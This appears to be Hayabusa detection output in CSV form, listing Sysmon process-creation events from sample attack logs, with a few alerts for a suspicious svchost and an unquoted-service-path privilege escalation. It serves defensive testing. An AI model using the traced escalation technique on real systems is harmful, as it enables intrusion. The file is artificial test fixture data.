+2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx
+2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe""  :  Path: C:\Windows\System32\cmd.exe  :  User: MSEDGEWIN10\IEUser  :  Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx
+2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe  :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe *  :  Path: C:\Windows\System32\autochk.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084   :  Path: C:\Windows\System32\smss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe  :  Path: C:\Windows\System32\wininit.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16  :  Path: C:\Windows\System32\csrss.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe  :  Path: C:\Windows\System32\winlogon.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe  :  Path: C:\Windows\System32\services.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe  :  Path: C:\Windows\System32\lsass.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d  :  Path: C:\Windows\System32\LogonUI.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe""  :  Path: C:\Windows\System32\dwm.exe  :  User: Window Manager\DWM-1  :  Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.485 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.487 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.600 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s nsi  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:25.603 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.158 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\Upfc.exe /launchtype boot /cv pVnjz5d3jkOKEwXZiJ9/ng.0  :  Path: C:\Windows\System32\upfc.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.303 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.507 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.536 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.540 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s SysMain  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.542 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.558 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.632 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.635 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\dxgiadaptercache.exe  :  Path: C:\Windows\System32\dxgiadaptercache.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.642 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s FontCache  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.643 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.645 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:26.652 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.196 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.473 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.484 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.583 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.764 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.836 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k NetSvcs -p -s iphlpsvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.838 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.855 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:27.970 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\NETWORK SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k utcsvc -p  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.063 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalServiceNoNetwork -p -s DPS  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.065 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.068 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s SstpSvc  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.079 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\wlms\wlms.exe  :  Path: C:\Windows\System32\wlms\wlms.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.080 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,Rule: PrivEsc - Potential Unquoted Service Exploit  :  Command: c:\Program Files\vulnsvc\mmm.exe  :  Path: C:\program.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.086 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.096 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
+2020-04-26 07:19:28.465 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\System32\svchost.exe -k LocalService -p -s WdiServiceHost  :  Path: C:\Windows\System32\svchost.exe  :  User: NT AUTHORITY\LOCAL SERVICE  :  Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx
